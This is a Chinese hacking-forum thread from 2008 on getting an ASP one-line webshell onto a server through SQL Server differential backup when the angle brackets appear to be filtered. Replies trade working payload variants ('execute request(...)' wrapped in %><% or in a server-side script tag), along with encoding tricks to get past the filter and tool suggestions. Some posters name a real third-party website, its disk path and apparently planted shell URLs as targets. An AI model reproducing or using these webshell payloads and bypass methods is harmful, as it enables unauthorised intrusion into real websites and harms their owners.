【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [讨论]遇到差异备分过滤了<>怎么办? [打印本页]

作者: 冰绿茶 时间: 2008-7-23 08:26 标题: [讨论]遇到差异备分过滤了<>怎么办?

[讨论]遇到差异备分过滤了<>怎么办?
议题作者：凋凌玫瑰
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

我在差异备后打开的文件显示如下:

Microsoft VBScript 编译器错误错误 '800a0408'

无效字符

/gbook/test3.asp，行 71

%Execute(request("abc"))%
^

备分的代码是:<%%25Execute(request("ah"))%%25>

好像是"<>"被过滤了

不知道这种情况咋个解决,请高手指点.

帖子79 精华12 积分3853 阅读权限100 性别男在线时间55 小时注册时间2006-2-26 最后登录2008-7-15 查看个人网站
查看详细资料TOP 少女暴富的隐秘（图）

守护天使

晶莹剔透§烈日灼然

作者: shirley 时间: 2008-7-23 08:26

[s:74] 我遇过

写成"%><%execute request("sb")%><%"这样来试试呢。。
帖子46 精华0 积分76 阅读权限40 来自深圳在线时间120 小时注册时间2006-4-25 最后登录2008-2-29 查看详细资料TOP 少女暴富的隐秘（图）

低调的沉默

晶莹剔透§烈日灼然

作者: 杰仔 时间: 2008-7-23 08:26

我的写成"%><%execute request("sb")%><%"不行！低调无罪，沉默有理

帖子2 精华0 积分9 阅读权限40 在线时间3 小时注册时间2006-10-9 最后登录2007-6-3 查看详细资料TOP 软件项目外包

cool俊

晶莹剔透§烈日灼然

作者: PLAN2000 时间: 2008-7-23 08:26

为什么不用nbsi3.0的log备份?
getwebshell就很好用..实在要差异备份.
就把一句木马转换成16进制再插入或者加上转义字符试试.还有可以把<>换成%lt;跟%gt;。换成%lt;,%gt;我没试过..不知道行不行...
详细自已到baidu搜搜啦..呵呵.我记不太清楚了
帖子3 精华0 积分9 阅读权限40 在线时间15 小时注册时间2005-6-14 最后登录2008-3-26 查看详细资料TOP

凋凌玫瑰

荣誉会员

作者: sam_slk 时间: 2008-7-23 08:26

nbsi3.0的log备份试了,根本就写不进去一句话,转换成十六进制也试了,不行.

帖子79 精华12 积分3853 阅读权限100 性别男在线时间55 小时注册时间2006-2-26 最后登录2008-7-15 查看个人网站
查看详细资料TOP 良辰择日，预测咨询，公司改名，权威易经

hack520

运维管理组

作者: 网飞鸿 时间: 2008-7-23 08:26

[s:75] 实话告诉你吧,没搞. [s:75]Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华6 积分5597 阅读权限150 性别男在线时间576 小时注册时间2005-3-18 最后登录2008-7-2 查看个人网站
查看详细资料TOP 少女暴富的隐秘（图）

cnhcerkf

运维管理组

作者: XIELLP 时间: 2008-7-23 08:26

同意楼上的，楼主为什么不换一个别的思路？能够back了意思是不是DBO的权限，得到了目录呢？为什么不看下别的目录有没有可以利用的东西？如果有别的目录为什么不去下层目录呢？
如果能找到管理员的一个TXT你就应该发了。珍爱生命，潜心修炼，早日成仙。
帖子374 精华2 积分3971 阅读权限150 性别男在线时间708 小时注册时间2006-8-27 最后登录2008-7-6 查看详细资料TOP 让女孩一夜变的更有女人味

dsaddd

作者: 晨曦的男朋友 时间: 2008-7-23 08:26

提示: 作者被禁止或删除内容自动屏蔽
帖子2 精华0 积分-401 阅读权限0 在线时间0 小时注册时间2006-10-9 最后登录2006-10-10 查看详细资料TOP

某牛人

晶莹剔透§烈日灼然

作者: 车大炮 时间: 2008-7-23 08:26

如果真的过滤了<的话
会提示在那个地方出错？？
其实没有过滤的
自己写段代码到ASP里面
看怎么才会出现类似的错误吧。
帖子28 精华0 积分82 阅读权限40 在线时间55 小时注册时间2006-3-2 最后登录2007-11-11 查看详细资料TOP

神無月

晶莹剔透§烈日灼然

作者: jencky 时间: 2008-7-23 08:26

要是确定是过滤<>了估计没门了.
帖子124 精华0 积分313 阅读权限40 性别男在线时间37 小时注册时间2006-4-22 最后登录2008-6-9 查看详细资料TOP

凋凌玫瑰

荣誉会员

作者: 醉鞭名马 时间: 2008-7-23 08:26

引用:
这里是引用第[5 楼]的hack520于2006-10-09 22:44发表的：
[s:75] 实话告诉你吧,没搞. [s:75]
搞还是有搞,列了下目录我也拿到了websehll,只是我在想这种过滤的方式怎么去突破,因为很少遇到过.

帖子79 精华12 积分3853 阅读权限100 性别男在线时间55 小时注册时间2006-2-26 最后登录2008-7-15 查看个人网站
查看详细资料TOP

cnhcerkf

运维管理组

作者: 高尔夫1.8t 时间: 2008-7-23 08:26

楼上的，既然得了webshell，能否把代码帖出来的？看他什么以什么方式过滤，替换或者是什么的，可能有方法，就跟那个aaspsp似的。。珍爱生命，潜心修炼，早日成仙。
帖子374 精华2 积分3971 阅读权限150 性别男在线时间708 小时注册时间2006-8-27 最后登录2008-7-6 查看详细资料TOP

ring04h

团队执行官

作者: ken2 时间: 2008-7-23 08:26

没可能过滤 <>  过滤了<>,他网站还能运行吗?  估计是%号的原因.
  上面都有提示了 % 无效字符.

  你试下这个  <script language=VBScript runat=server>execute request("sb")</Script>
帖子3923 精华128 积分209640 阅读权限200 性别男在线时间1096 小时注册时间2007-10-23 最后登录2008-7-21 查看详细资料TOP

hack520

运维管理组

作者: Asker 时间: 2008-7-23 08:26

引用:
这里是引用第[10 楼]的凋凌玫瑰于2006-10-10 10:22发表的：

搞还是有搞,列了下目录我也拿到了websehll,只是我在想这种过滤的方式怎么去突破,因为很少遇到过.
偶滴意思是说，过滤了<>,要是通过bluk，确实木搞。当然咯，搞站大法也不是就这几下吧~~ [s:75] [s:75]Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华6 积分5597 阅读权限150 性别男在线时间576 小时注册时间2005-3-18 最后登录2008-7-2 查看个人网站
查看详细资料TOP

走在云上

晶莹剔透§烈日灼然

作者: s369 时间: 2008-7-23 08:26

字符转换不行的话就不知道了哈哈我是菜鸟我怕谁
帖子13 精华0 积分15 阅读权限40 在线时间17 小时注册时间2006-8-9 最后登录2008-6-4 查看详细资料TOP

菜菜阿哲

晶莹剔透§烈日灼然

作者: biaofbi 时间: 2008-7-23 08:26

我杂遇见的比他还郁闷我差异悲愤的整个马都消失了猪三哥帮给看看贝

http://www.czfdcw.com.cn/yejie/text/articleshow.asp?id=14039

e:\czfdcw.com.cn\

悲愤出来的就没俺的一句话
帖子16 精华0 积分46 阅读权限40 在线时间27 小时注册时间2006-10-5 最后登录2007-7-19 查看详细资料TOP

平安年间

晶莹剔透§烈日灼然

作者: 大胃仔 时间: 2008-7-23 08:26

前后加%><%execute request("#")%><%应是可行的，不过备份后可能又会出新的错误

什么什么无效字符类的提示

如果不行，可以试下lake2的unicode字符并非高手

帖子62 精华2 积分245 阅读权限40 性别男在线时间11 小时注册时间2006-10-3 最后登录2008-5-13 查看个人网站
查看详细资料TOP

akens

晶莹剔透§烈日灼然

作者: dickson 时间: 2008-7-23 08:26

楼上的,话怎么说一半就说了呢
UNICODE具体怎么实现
帖子22 精华0 积分59 阅读权限40 性别男在线时间106 小时注册时间2006-9-30 最后登录2008-6-21 查看详细资料TOP

akens

晶莹剔透§烈日灼然

作者: jazz 时间: 2008-7-23 08:26

我提交一句话出现这个问题
Active Server Pages 错误 'ASP 0141'

Page 命令重复

/ken.asp，行 714

@ 命令只能在 Active Server Page 中使用一次。
谁来解释下呢
帖子22 精华0 积分59 阅读权限40 性别男在线时间106 小时注册时间2006-9-30 最后登录2008-6-21 查看详细资料TOP

trace

晶莹剔透§烈日灼然

作者: 豆粒 时间: 2008-7-23 08:26

引用:
这里是引用第[18 楼]的akens于2006-10-23 15:14发表的：
我提交一句话出现这个问题
Active Server Pages 错误 'ASP 0141'

Page 命令重复

.......
估计他asp代码首句是
<%@language=VBScript%>
而你又指定了脚本语言一次.
帖子111 精华0 积分304 阅读权限40 性别男在线时间137 小时注册时间2006-4-3 最后登录2008-7-4 查看详细资料TOP

风云逸剑

晶莹剔透§烈日灼然

作者: jerryho 时间: 2008-7-23 08:26

郁闷呀

我还遇上不能SA不能备份 [s:34]
帖子66 精华0 积分212 阅读权限40 性别男在线时间181 小时注册时间2006-4-12 最后登录2008-7-18 查看详细资料TOP

xunix

晶莹剔透§烈日灼然

作者: 杨羽 时间: 2008-7-23 08:26

我遇到的和你差不多
我的还多一样，就是把我的所有的语句读给写三次
我传个文本上去居然也是三次
我这个的原因估计是我把IIS配置里面的那个防止错误选项勾上了
现在上网不方便也没有深究。
有条件的朋友那个2003实验一下做人还是脚踏实地的好

帖子4 精华0 积分13 阅读权限40 性别男在线时间11 小时注册时间2006-5-29 最后登录2008-6-3 查看详细资料TOP

追寻

荣誉会员

作者: 德军1941 时间: 2008-7-23 08:26

我一般备份不成功的话就会去尝试列目录找找网站的数据库。然后XXXX

帖子561 精华2 积分4271 阅读权限100 性别男在线时间525 小时注册时间2006-9-23 最后登录2008-7-22 查看个人网站
查看详细资料TOP

cnxhack

晶莹剔透§烈日灼然

作者: 狗狗汪汪 时间: 2008-7-23 08:26

[s:75] http://www.czfdcw.com.cn/blog/net.asp

见多了.. 好搞.
http://www.czfdcw.com.cn/blog/321.asp
帖子17 精华0 积分53 阅读权限40 性别男在线时间6 小时注册时间2006-5-3 最后登录2008-6-26 查看详细资料TOP

可酷可乐

晶莹剔透§烈日灼然

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)